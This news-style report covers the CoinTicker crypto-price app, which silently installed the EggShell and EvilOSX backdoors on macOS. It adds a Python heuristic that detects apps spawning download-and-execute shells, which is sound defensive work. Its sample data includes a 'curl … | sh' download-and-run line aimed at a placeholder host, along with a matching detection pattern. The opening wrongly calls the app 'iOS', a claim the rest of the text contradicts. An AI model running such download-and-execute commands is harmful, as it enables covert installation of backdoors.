Malwarebytes, a platform that protects users from malware, malicious websites and other advanced online threats, reported that 1vladimir, a contributor to the Malwarebytes forum, noted that the CoinTicker iOS app used to monitor cryptocurrency prices was covertly installing two different backdoors on users' computers.
The report also stated that the app did not show any visible sign of malicious activity, so a user would keep using it without realizing that they had been exposed to compromise. After installation, the CoinTicker app lets users select the cryptocurrencies whose prices they want to track. Some of the major cryptocurrencies include Bitcoin [BTC], Ethereum [ETH] and Monero [XMR].
In addition, a small widget is added to the macOS menu bar that updates the prices as they fluctuate. Once the application is installed on the computer, CoinTicker downloads EvilOSX and EggShell, both of which are open-source backdoors.
After installation, a customized version of the EggShell server is downloaded to macOS with the help of shell commands. Although the goal of the attacker behind this malware is still unclear, both EggShell and EvilOSX are backdoors that could be used to gain access to users' cryptocurrency and steal it.
The report states that this may have been a supply-chain attack, in which the creator and the application itself are legitimate but the website is compromised by a third party to distribute a malicious version of the app.
Further inquiries revealed that the app was never legitimate in the first place. The application's domain name is "coin-sticker.com", which does not match the application name. According to the report, a wrong domain name would have been "terribly sloppy" for a legitimate app.
Furthermore, the domain name was registered only a couple of months ago, which raised further suspicion. The report also noted that the malware does not require root permission, even though there is a common misconception that malware needs root privileges to be dangerous. This malware is an example of how malware can pose a serious threat without root privileges.
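The two behaviours described above, a GUI app spawning a shell to fetch and run a remote payload, and doing so entirely as an unprivileged user, are exactly what an endpoint detection rule can key on. The following is an added example written for this page, not code from Malwarebytes, CoinTicker, EggShell or EvilOSX: it runs a simple heuristic over a constructed process-tree sample (all pids, paths, uids and the `placeholder.invalid` URL are made up) and flags any shell launched directly by an application bundle whose command line pipes a download into an interpreter. The `uid` field shows that the flagged process runs as an ordinary user, not root.

```python
"""Flag app bundles that spawn a shell which pipes a download into an interpreter.

Heuristic detection over a constructed process-event sample (hypothetical data).
This is illustrative code for this article, not Malwarebytes' or CoinTicker's code.
"""
import re
from typing import Dict, List, Optional

# Matches ".../Something.app/Contents/MacOS/..." and captures the bundle name.
APP_BUNDLE_RE = re.compile(r"/([^/]+\.app)/Contents/MacOS/")

# Shell binaries whose command lines we inspect.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

# Apps that legitimately host interactive shells; a shell under these is expected.
TERMINAL_APPS = {"Terminal.app", "iTerm.app"}

# "curl ... | sh" / "wget ... | python" style download-and-execute pipelines.
DOWNLOAD_PIPE_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|zsh|python\d*)\b")

# Constructed sample events (pid, parent pid, uid, executable path, command line).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 1, "ppid": 0, "uid": 0,
     "exe": "/sbin/launchd", "cmd": "/sbin/launchd"},
    {"pid": 410, "ppid": 1, "uid": 501,
     "exe": "/Applications/CoinTicker.app/Contents/MacOS/CoinTicker", "cmd": "CoinTicker"},
    {"pid": 412, "ppid": 410, "uid": 501,
     "exe": "/bin/sh", "cmd": "sh -c curl -fsSL http://placeholder.invalid/s.sh | sh"},
    {"pid": 420, "ppid": 1, "uid": 501,
     "exe": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmd": "Terminal"},
    {"pid": 421, "ppid": 420, "uid": 501,
     "exe": "/bin/zsh", "cmd": "zsh"},
    {"pid": 430, "ppid": 1, "uid": 501,
     "exe": "/Applications/Safari.app/Contents/MacOS/Safari", "cmd": "Safari"},
]


def app_bundle_of(exe: str) -> Optional[str]:
    """Return the .app bundle name an executable belongs to, or None."""
    m = APP_BUNDLE_RE.search(exe)
    return m.group(1) if m else None


def find_download_and_run(events: List[Dict]) -> List[Dict]:
    """Return one finding per shell that (a) was spawned directly by a non-terminal
    app bundle and (b) pipes a curl/wget download into an interpreter."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Dict] = []
    for e in events:
        if e["exe"] not in SHELLS or not DOWNLOAD_PIPE_RE.search(e["cmd"]):
            continue
        parent = by_pid.get(e["ppid"])
        app = app_bundle_of(parent["exe"]) if parent else None
        if app is None or app in TERMINAL_APPS:
            continue
        findings.append({"app": app, "pid": e["pid"], "uid": e["uid"], "cmd": e["cmd"]})
    return findings


if __name__ == "__main__":
    for f in find_download_and_run(SAMPLE_EVENTS):
        print(f"[ALERT] {f['app']} (uid {f['uid']}) spawned pid {f['pid']}: {f['cmd']}")
```

Only the shell under CoinTicker.app is reported; the interactive zsh under Terminal.app is not, because it neither matches the download pipeline nor has a non-terminal app as its parent. Note that nothing in the rule depends on uid 0: the flagged chain runs entirely as user 501, which is the point the report makes about root privileges.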